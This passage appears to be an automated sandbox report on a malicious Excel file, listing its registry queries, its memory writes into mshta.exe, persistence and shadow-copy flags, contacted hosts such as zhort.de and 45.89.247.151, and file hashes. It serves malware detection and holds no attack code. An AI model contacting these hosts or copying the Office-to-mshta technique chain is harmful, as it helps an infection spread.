Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1408 wrote to memory of 4736 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1408 wrote to memory of 4736 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4336,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 88.221.134.89:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 38.66.99.88.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 89.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 151.247.89.45.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/1408-0-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-1-0x00007FF85620D000-0x00007FF85620E000-memory.dmp

memory/1408-2-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-5-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-6-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-4-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-9-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-8-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-12-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-13-0x00007FF813C60000-0x00007FF813C70000-memory.dmp

memory/1408-11-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-10-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-16-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-19-0x00007FF813C60000-0x00007FF813C70000-memory.dmp

memory/1408-21-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-20-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-18-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-17-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-15-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-14-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-7-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-3-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/4736-38-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/4736-44-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-46-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/1408-47-0x00007FF85620D000-0x00007FF85620E000-memory.dmp

memory/4736-51-0x00007FF856170000-0x00007FF856365000-memory.dmp

memory/4736-52-0x00007FF72C490000-0x00007FF72C498000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 5bdcc76a93dd695f2e24fd442134a395
SHA1 fcae6e8d16accd2a540699cbd1293dcd8c48ef25
SHA256 b8a910938f0920c50c3acca17f99288ae0c95c010e75f42c6d2eb7db82a46033
SHA512 b5b2f9e1b0522c410e7ec513531221ec68093b6f1738ffcffb7f2bb1e73a778d4b46249a3f6d530033a369b957a399655278cb75d5333c4247ae3367d797ffa2

memory/1408-86-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-85-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-87-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-84-0x00007FF8161F0000-0x00007FF816200000-memory.dmp

memory/1408-88-0x00007FF856170000-0x00007FF856365000-memory.dmp